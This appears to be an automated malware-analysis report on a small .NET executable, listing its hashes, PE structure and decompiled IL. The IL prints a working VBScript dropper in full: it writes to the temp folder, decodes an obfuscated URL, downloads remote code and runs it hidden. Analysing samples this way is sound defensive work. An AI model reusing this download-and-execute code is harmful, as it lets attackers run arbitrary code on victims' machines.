Suspicious
Suspect

6337390646b9170dfa1665d3d5dbeab1

PE Executable | MD5: 6337390646b9170dfa1665d3d5dbeab1 | Size: 5.63 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score: Very low

Hash
Hash Value
MD5
6337390646b9170dfa1665d3d5dbeab1
Sha1
713eb28c001ce03d58e364582c3b0468a86604c2
Sha256
9bd13624a44f44d6ca82c9641ba950d8e329fd5132fad7681e37cc338afc2418
Sha384
633127d71d0a80bb9511f415ed21a1295a3b32bad0537eb7601d5c9c2363c00815421cee3c35f1c62fdfc2738eec8491
Sha512
dcb53c87b1eed54d46480d78e5871039caf93a3f6da5efdc972683cdc767dc0cff03d04cb83e5e2d8d75e18d105fd33f692e53930d242f7b46d1a25ca411c111
SSDeep
48:6HtRzWS3J3ybwxwY5IFGu7d0666lc2uDl+OEZEluj4j8feA6sFVuulxxxVKqXSfG:URjnQaEZElqU8fDxVxEzNt
TLSH
A2C12E02B3F84215F3B71B715BB397201B7ABA229C3DC78C1584050E7DEDA548962BB3

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Information
Name | Value
Module Name | Program.exe
Full Name | Program.exe
EntryPoint | System.Void Program::Main()
Scope Name | Program.exe
Scope Type | ModuleDef
Kind | Console
Runtime Version | v4.0.30319
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | Program
Assembly Version | 0.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | <null>
Total Strings | 6
Main Method | System.Void Program::Main()
Main IL Instruction Count | 35

Main IL

nop <null>
call System.String System.IO.Path::GetTempPath()
ldstr mi_script.vbs
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.0 <null>
ldstr Option Explicit
    Dim http, scriptCode
    Dim wow
    Dim objNetwork, userName, message
    ' Obtener el nombre del usuario actual
    Set objNetwork = CreateObject("WScript.Network")
    userName = objNetwork.UserName
    ' Crear un mensaje de bienvenida
    message = "PDF" & userName & "ERROR"
    wow = "##################################dN7tXI51/r/################################################ee.etsa############p//:sptt############################################################h"
    wow = Replace(wow, "#", "")
    wow = StrReverse(wow)
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", wow, False
    http.Send
    If http.Status = 200 Then
    scriptCode = http.ResponseText
    ExecuteGlobal scriptCode
    End If
stloc.1 <null>
ldloc.0 <null>
ldloc.1 <null>
call System.Void System.IO.File::WriteAllText(System.String,System.String)
nop <null>
ldstr "
ldloc.0 <null>
ldstr "
call System.String System.String::Concat(System.String,System.String,System.String)
stloc.2 <null>
ldstr wscript.exe
ldloc.2 <null>
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String)
stloc.3 <null>
ldloc.3 <null>
ldc.i4.0 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
nop <null>
ldloc.3 <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
nop <null>
ldloc.3 <null>
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo)
pop <null>
ldstr Script VBScript ejecutado.
call System.Void System.Console::WriteLine(System.String)
nop <null>
ret <null>

Artefacts
Name | Value
Embedded Resources | 0
Suspicious Type Names (1-2 chars) | 0

Characteristics
No malware configuration was found at this point.